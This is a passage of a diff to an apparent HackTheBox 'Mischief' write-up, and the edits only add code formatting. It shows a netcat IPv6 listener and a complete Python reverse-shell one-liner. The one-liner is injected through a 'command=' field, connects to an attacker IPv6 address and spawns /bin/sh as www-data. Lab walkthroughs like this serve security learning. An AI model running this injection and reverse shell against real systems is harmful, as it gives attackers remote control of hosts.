thosearetheguise/thosearetheguise.github.io/_posts/2019-01-06-htb-Mischief.md

 tcp       0      0 0.0.0.0:443                  :::*                    LISTEN
 ```

-In order to listen on tcp6 we need to install the openbsd version of netcat with apt-get install netcat-openbsd.
+In order to listen on tcp6 we need to install the openbsd version of netcat with `apt-get install netcat-openbsd`.
 Once we have that installed we can use it to listen on IPv6:
 ```
 root@kali: nc.openbsd -6 -nlvp 443
 ```

-In another terminal we can verify it with the same netstat command
+In another terminal we can verify it with the same `netstat` command
 ```
 root@kali: netstat -an | grep LISTEN
 tcp6       0      0 :::443                  :::*                    LISTEN
 ```

-Now to get our python reverse shell to run on IPv6 we need to change the socket type from AF_INET to AF_INET6.
+Now to get our python reverse shell to run on IPv6 we need to change the socket type from `AF_INET` to `AF_INET6`.
 Once we have done that, we update the attacker IP to be the IPv6 and our final command comes out to be:
 ```
 command=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::100a",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'; ping -c 1 127.0.0.1
 ```

-and we get a reverse shell as www-data:
+and we get a reverse shell as `www-data`:
 ```
 root@kali: nc.openbsd -6 -nlvp 443
 Listening on [::] (family 10, port 117499167)